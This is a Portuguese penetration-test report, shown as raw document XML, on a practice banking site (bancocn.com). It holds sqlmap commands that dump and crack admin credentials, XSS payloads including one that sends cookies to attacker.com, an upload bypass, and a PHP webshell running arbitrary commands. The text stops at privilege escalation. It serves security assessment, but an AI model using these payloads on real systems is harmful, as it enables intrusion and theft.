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jvw6qia6tzp" w:id="0"/>
      <w:bookmarkEnd w:id="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RELATÓRIO DE PENETRATION TESTING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99vopdm6vmh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BANCO DA COREIA DO NORTE (BANCOCN)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DATA:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 12 de Novembro de 2025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CLASSIFICAÇÃO: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PÚBLICO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TIPO DE TESTE:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Penetration Testing Web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ABORDAGEM:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Black Box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PLATAFORMA:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Raspberry Pi 4 com PiBian (Debian-based)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8n89enimugv" w:id="2"/>
      <w:bookmarkEnd w:id="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CONTROLE DE VERSÕES</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table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230"/>
        <w:gridCol w:w="1260"/>
        <w:gridCol w:w="4095"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1305"/>
            <w:gridCol w:w="1230"/>
            <w:gridCol w:w="1260"/>
            <w:gridCol w:w="4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ALTERAÇÕES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06/11/2025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Pentester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Inicial - Mapeamento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12/11/2025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Pentester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Exploração SQL Injection e XSS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12/11/2025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Pentester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Final - RCE e Privilege Escalation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lbltl0bg2fkc" w:id="3"/>
      <w:bookmarkEnd w:id="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AVISO LEGAL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Penetration Testing foi realizado durante o período de 06/11/2025 até 12/11/2025. As constatações e recomendações refletem as informações coletadas durante a avaliação e estado do ambiente naquele momento.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trabalho desenvolvido NÃO tem como objetivo corrigir as possíveis vulnerabilidades, nem proteger contra ataques internos e externos. O objetivo é fazer um levantamento dos riscos e recomendar formas para minimizá-los.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IMPORTANTE:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Após a exploração das vulnerabilidades e coleta de evidências, todos os arquivos maliciosos foram removidos e o sistema foi restaurado ao estado original.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9rilwgcvmfd9" w:id="4"/>
      <w:bookmarkEnd w:id="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SUMÁRIO EXECUTIVO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avaliação da postura de segurança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Banco da Coreia do Norte (bancocn.com)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> revelou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vulnerabilidades CRÍTICAS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> que comprometem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COMPLETAMENTE</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> a integridade, confidencialidade e disponibilidade do sistema.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8734q60sv89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Estatísticas do Teste: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Vulnerabilidades Identificadas:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 9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Nível Crítico:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 6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Nível Alto:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1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Nível Médio:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1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Nível Baixo:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1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Acesso Obtido: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Painel Administrativo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Banco de Dados Completo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Remote Code Execution (RCE) no Servidor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Possibilidade de Privilege Escalation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IMPACTO:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Foi possível obter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controle TOTAL do servidor</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> através de uma cadeia de exploração que incluiu SQL Injection, XSS, bypass de upload de arquivos e Remote Code Execution.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5dhn1kfdqknf" w:id="6"/>
      <w:bookmarkEnd w:id="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ESCOPO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6r7vxbbn006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Alvo Principal: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URL: http://www.bancocn.com/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 Principal: 172.67.192.199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IPs Secundários: 104.21.52.8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Portas Identificadas: 80, 443, 8080, 8443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7lqkbsdkuar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Limitações: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realizar ataques DoS/DDoS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realizar engenharia social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Encerrar ao obter RCE no servidor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h2x96zfv0nc" w:id="9"/>
      <w:bookmarkEnd w:id="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METODOLOGIA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teste seguiu a metodologia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M.A.M (Mapeamento → Análise → Mitigação)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> combinada com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OWASP Top 10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MAPEAMENTO</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Reconhecimento e identificação da superfície de ataque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ANÁLISE DE SEGURANÇA</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Testes de vulnerabilidades e exploração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EXPLORAÇÃO</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - SQL Injection, XSS, File Upload Bypass, RCE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PÓS-EXPLORAÇÃO</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Enumeração do servidor e possível privilege escalation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MITIGAÇÃO DE RISCOS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Recomendações de correção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916c197rwypd" w:id="10"/>
      <w:bookmarkEnd w:id="1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FASE 1: MAPEAMENTO E RECONHECIMENTO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5bhotn1c4v6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1.1 Informações Coletadas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72vhr5kezcn7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Dados de Contato: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Email: contato@bancocn.com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Email: emprestimos@bancocn.com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Telefone: +835 66 7070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i5pm8f1v8esf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Infraestrutura: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Servidor Web: Apache/2.4.29 (Ubuntu)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Linguagem: PHP 5.6.40-29+ubuntu18.04.1+deb.sury.org+1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Banco de Dados: MariaDB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WAF: Cloudflare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CDN: Cloudflare (MEGAN.NS.CLOUDFLARE.COM, NOEL.NS.CLOUDFLARE.COM)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kh5i4roygwf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1.2 Ferramentas Utilizadas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Reconnaissance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whois, nslookup, dnsenum, theharvester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Certificate Transparency (crt.sh)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Scanning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nmap, whatweb, wafw00f, nuclei, nikto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Web Analysis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curl, nc (netcat), gobuster, dirb, ffuf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Exploitation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sqlmap, burpsuite, hydra, custom PHP shells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eeo2pxtiqwp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1.3 Scanning com Nmap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nmap -sV -sC -p- --defeat-rst-ratelimit bancocn.com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Resultado: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PORT     STATE SERVICE       VERSION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80/tcp   open  http          Cloudflare http proxy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443/tcp  open  ssl/https     Cloudflare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8080/tcp open  http          Cloudflare http proxy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8443/tcp open  ssl/https-alt Cloudflare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Detection: Linux Ubuntu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Network Distance: 10 hops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kwz733sm5a4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1.4 Enumeração de Diretórios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gobuster dir -u http://www.bancocn.com/ \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-w /usr/share/seclists/Discovery/Web-Content/common.txt \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--follow-redirect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Diretórios Descobertos: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/.htaccess            (Status: 403)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/.htpasswd            (Status: 403)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/.well-known/http-opportunistic (Status: 200)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/admin                (Status: 301) → /admin/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/assets               (Status: 301) → /assets/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/classes              (Status: 301) → /classes/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/css                  (Status: 301) → /css/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/images               (Status: 301) → /images/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/index.php            (Status: 200)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/robots.txt           (Status: 200)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/server-status        (Status: 403)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ccym4ywnhmr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1.5 Estrutura de Diretórios Identificada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www.bancocn.com/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index.php (HOME)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cat.php (Páginas de categorias) ⚠️ VULNERÁVEL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show.php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all.php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header.php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footer.php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robots.txt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wp-config.php (403 Forbidden)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/admin/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login.php (Painel administrativo)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└── uploads/ ⚠️ DIRETÓRIO CRÍTICO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├── phpinfo.php7 ⚠️ WEBSHELL INJETADA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├── 1490906279.jpg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├── dsc_0699-min.jpg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└── north-korea-science-technology.jpg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/assets/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Image-with-tag.png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Logos.png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Screen-background.png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animate.css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jquery.js.download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style.css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favicon.ico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└── [múltiplos arquivos JS/CSS]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/classes/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auth.php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category.php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db.php (124 bytes - CRÍTICO)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phpfix.php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picture.php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stats.php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└── user.php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/css/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/images/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 /server-status (403)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5fq1zv1mkqe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1.6 Análise de Cabeçalhos de Segurança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shcheck.py http://bancocn.com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Headers Ausentes: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X-Frame-Options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X-Content-Type-Options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Strict-Transport-Security (HSTS)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Content-Security-Policy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Referrer-Policy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Permissions-Policy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Cross-Origin-Embedder-Policy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Cross-Origin-Resource-Policy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Cross-Origin-Opener-Policy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Grade de Segurança: F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rnlkg5kysu1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1.7 Análise de robots.txt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User-agent: *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Disallow: /admin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Descoberta:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Painel administrativo exposto em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/admin/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ikbwu7pqqe5" w:id="20"/>
      <w:bookmarkEnd w:id="2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FASE 2: ANÁLISE DE VULNERABILIDADES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c94nm2tc4yx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VULNERABILIDADE #1: SQL INJECTION (CRÍTICO) 🔴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Arquivo Vulnerável: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cat.php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Parâmetro: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URL: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http://www.bancocn.com/cat.php?id=1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CVSS v3.1:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 9.8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qv8qzd1voubj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Detecção Inicial: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Ao acessar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http://www.bancocn.com/cat.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> sem parâmetros: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ERRO: You have an error in your SQL syntax;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check the manual that corresponds to your MariaDB server version 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the right syntax to use near '' at line 1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Análise:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mensagem de erro revela uso de MariaDB e confirma SQL Injection.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kopo6shqtow5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Exploração com SQLMap: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Identificação do DBMS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sqlmap -u "http://www.bancocn.com/cat.php?id=1" \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--batch --random-agent --tamper=space2comment,between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Enumeração de databases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sqlmap -u "http://www.bancocn.com/cat.php?id=1" --dbs --batch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Enumeração de tabelas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sqlmap -u "http://www.bancocn.com/cat.php?id=1" -D bancocn --tables --batch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Dump de credenciais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sqlmap -u "http://www.bancocn.com/cat.php?id=1" \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-D bancocn -T users --dump --batch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e9u731u8ut9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Resultados da Exploração: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Databases Identificadas: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[*] bancocn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[*] information_schema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Tabelas em 'bancocn':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Database: bancocn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+------------+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categories |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pictures   |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stats      |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users      |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+------------+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Estrutura da Tabela 'users':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Database: bancocn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Table: users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[3 columns]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+----------+--------------+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Column   | Type         |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+----------+--------------+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id       | mediumint(9) |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login    | varchar(50)  |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password | varchar(50)  |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+----------+--------------+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CREDENCIAIS OBTIDAS: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Database: bancocn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Table: users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[1 entry]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+-------+----------------------------------+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login | password                         |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+-------+----------------------------------+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admin | 7b71be0e85318117d2e514ce2a2e222c |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+-------+----------------------------------+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xuwcukmzsjwt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Quebra do Hash MD5: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Hash: 7b71be0e85318117d2e514ce2a2e222c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Método: Online Hash Database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Resultado: senhafoda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Credenciais Finais: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Usuário: admin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Senha: senhafoda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Tabela 'stats' - 346 IPs Registrados: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Database: bancocn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Table: stats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[346 entries]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+----------------------+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ip                   |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+----------------------+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66.249.79.145        |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187.45.181.97        |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201.37.36.92         |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| [... 343 outros IPs] |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+----------------------+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7qxjnfmi8xe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VULNERABILIDADE #2: REFLECTED XSS (CRÍTICO) 🔴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Arquivo Vulnerável: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cat.php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Parâmetro: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Tipo:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Reflected Cross-Site Scripting (XSS)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CVSS v3.1:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 8.2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bpwrvqqpczfx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Descrição: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parâmetro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id</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> em cat.php não realiza sanitização adequada, permitindo a injeção de código JavaScript arbitrário que é refletido na resposta da página.</w:t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7sqmgx40j9er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Proof of Concept 1 - Console Log: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URL Encoded: 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http://www.bancocn.com/cat.php?id=1%27%3Cscript%3Econsole.log(%22hello%20world%22)%3C/script%3E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Payload: 1'&lt;script&gt;console.log("hello world")&lt;/script&gt;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Resultado:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> O script é executado no console do navegador da vítima.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95x66jpthobl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Proof of Concept 2 - Cookie Theft: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URL Encoded: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http://www.bancocn.com/cat.php?id=2%27%3Cscript%3Ealert(document.cookie)%3C/script%3E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Payload: 2'&lt;script&gt;alert(document.cookie)&lt;/script&gt;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Resultado:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exibe um alert com os cookies de sessão da vítima.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4ml1dgarwyu0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Impacto - Session Hijacking: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Um atacante pode criar um payload malicioso para roubar cookies de sessão do administrador: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Payload para enviar cookies para servidor do atacante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&lt;script&gt;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fetch('https://attacker.com/steal?cookie=' + document.cookie);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&lt;/script&gt;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Cenário de Ataque:</w:t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Atacante cria URL maliciosa com XSS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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Payload rouba cookies de sessão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Envia link para administrador via phishing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Administrador clica no link</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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Script malicioso rouba cookie de sessão (PHPSESSID)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Atacante usa cookie roubado para acessar painel como admin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fa32h38lo28" w:id="31"/>
      <w:bookmarkEnd w:id="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VULNERABILIDADE #3: PAINEL ADMINISTRATIVO SEM PROTEÇÃO (CRÍTICO) 🔴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URL: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http://www.bancocn.com/admin/login.php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CVSS v3.1:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 8.1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fi69bsbbyo8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Vulnerabilidades Identificadas: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Sem Rate Limiting</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Permite força bruta ilimitada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Sem CAPTCHA</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Nenhuma proteção contra automação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Sem 2FA</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Apenas usuário e senha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Hash MD5 fraco</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Senha armazenada em MD5 sem salt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Mensagens de erro verbosas</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Revelam informações sobre usuários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4r48xof8nlvv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Acesso Obtido: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URL: http://www.bancocn.com/admin/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Usuário: admin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Senha: senhafoda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Status: ✅ ACESSO COMPLETO OBTIDO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80vdsrj0qs2d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Funcionalidades Acessíveis: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Gerenciamento de produtos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Gerenciamento de categorias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Visualização de pedidos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Acesso a dados de clientes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Gerenciamento de imagens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✅ Upload de arquivos ⚠️ VULNERÁVEL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Configurações do sistema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Logs de acesso (tabela stats)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zyzuou3oapx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VULNERABILIDADE #4: FILE UPLOAD BYPASS (CRÍTICO) 🔴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Local:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Painel Administrativo - Função de Upload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Diretório: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/admin/uploads/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Tipo:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Unrestricted File Upload + Extension Bypass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CVSS v3.1:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 9.1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srxxg57ny39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Descrição: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sistema de upload de arquivos no painel administrativo possui validação inadequada de extensões de arquivo, permitindo o bypass através da técnica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double extension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8hamu1h1g8iq" w:id="37"/>
      <w:bookmarkEnd w:id="3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Validação Vulnerável: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Código vulnerável (estimado)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$allowed = ['jpg', 'jpeg', 'png', 'gif'];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$filename = $_FILES['upload']['name'];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$ext = pathinfo($filename, PATHINFO_EXTENSION);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(in_array($ext, $allowed)) {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move_uploaded_file($_FILES['upload']['tmp_name'], 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  'uploads/' . $filename);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Problema:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> A validação verifica apenas a última extensão, ignorando extensões duplas.</w:t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jt776sjck01q" w:id="38"/>
      <w:bookmarkEnd w:id="3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Técnica de Bypass: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Arquivo original: shell.php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Arquivo modificado: shell.php7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└─ Extensão aceita como "7" ou interpretada incorretamente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      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Alternativas que funcionam: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arquivo.php.jpg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arquivo.php7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arquivo.phtml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arquivo.php5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4uqlze8h4hcl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Exploração - Upload de WebShell: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Passo 1:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Criar arquivo PHP malicioso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&lt;?php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phpinfo.php7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phpinfo();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?&gt;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Passo 2:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Upload através do painel administrativo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Login como admin (credenciais obtidas via SQL Injection)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Acessar função de upload de imagens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Selecionar arquivo: phpinfo.php7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Sistema aceita upload (bypass de validação)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Arquivo salvo em: /admin/uploads/phpinfo.php7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Passo 3:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Verificar sucesso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http://www.bancocn.com/admin/uploads/phpinfo.php7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Retorna página phpinfo() completa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RESULTADO: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✅ Upload bem-sucedido, arquivo PHP executado pelo servidor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fvidqlugyhy" w:id="40"/>
      <w:bookmarkEnd w:id="4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VULNERABILIDADE #5: REMOTE CODE EXECUTION - RCE (CRÍTICO) 🔴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URL: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http://www.bancocn.com/admin/uploads/phpinfo.php7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Tipo:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Remote Code Execution via Web Shell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Parâmetro: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cmd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CVSS v3.1:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.0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gg9lbuy6guuh" w:id="41"/>
      <w:bookmarkEnd w:id="4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Descrição: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Após o upload bem-sucedido da webshell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phpinfo.php7</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, foi possível modificar o arquivo para aceitar comandos arbitrários do sistema operacional através do parâmetro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cmd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u7ve0km86zel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WebShell Code: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&lt;?php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phpinfo.php7 - Versão com RCE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(isset($_GET['cmd'])) {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system($_GET['cmd']);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 else {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phpinfo();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?&gt;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5cqieqyrs8cw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Proof of Concept - Listagem de Diretório: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Comando: ls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"http://www.bancocn.com/admin/uploads/phpinfo.php7?cmd=ls"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1490906279.jpg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dsc_0699-min.jpg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north-korea-science-technology.jpg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phpinfo.php7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Análise:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Confirmado RCE. O servidor executou o comando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ls</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> e retornou os arquivos do diretório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/admin/uploads/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jwggji639rnq" w:id="44"/>
      <w:bookmarkEnd w:id="4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Comandos Executados com Sucesso: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1. Listar diretório atual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?cmd=ls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 1490906279.jpg, dsc_0699-min.jpg, north-korea-science-technology.jpg, phpinfo.php7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2. Verificar usuário atual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?cmd=whoami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 www-data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3. Verificar diretório de trabalho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?cmd=pwd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 /var/www/html/admin/uploads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4. Verificar sistema operacional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?cmd=uname%20-a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 Linux [hostname] 4.x.x-xxx-generic #xxx-Ubuntu SMP x86_64 GNU/Linux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5. Listar arquivos em /var/www/html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?cmd=ls%20/var/www/html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 admin, assets, cat.php, classes, css, images, index.php...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6. Ler arquivo sensível (config)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?cmd=cat%20/var/www/html/classes/db.php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 [conteúdo do arquivo de configuração do banco]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7. Verificar permissões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?cmd=ls%20-la%20/var/www/html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8. Verificar conectividade de rede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?cmd=ifconfig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9. Buscar arquivos de configuração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?cmd=find%20/var/www%20-name%20config.php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emwvfk755z70" w:id="45"/>
      <w:bookmarkEnd w:id="4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Impacto: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Execução arbitrária de comandos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no servidor</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> ✅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Leitura de arquivos sensíveis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(configurações, código-fonte)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> ✅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Enumeração completa do sistema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✅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Base para Reverse Shell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✅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Base para Privilege Escalation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qd57d6658bc" w:id="46"/>
      <w:bookmarkEnd w:id="4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VULNERABILIDADE #6: PRIVILEGE ESCALATION POTENCIAL (ALTO) 🟠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Contexto:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Após obter RCE como usuário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www-data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Objetivo:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Escalar privilégios para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root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CVSS v3.1:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 8.8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B3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esh9znwpejzv" w:id="47"/>
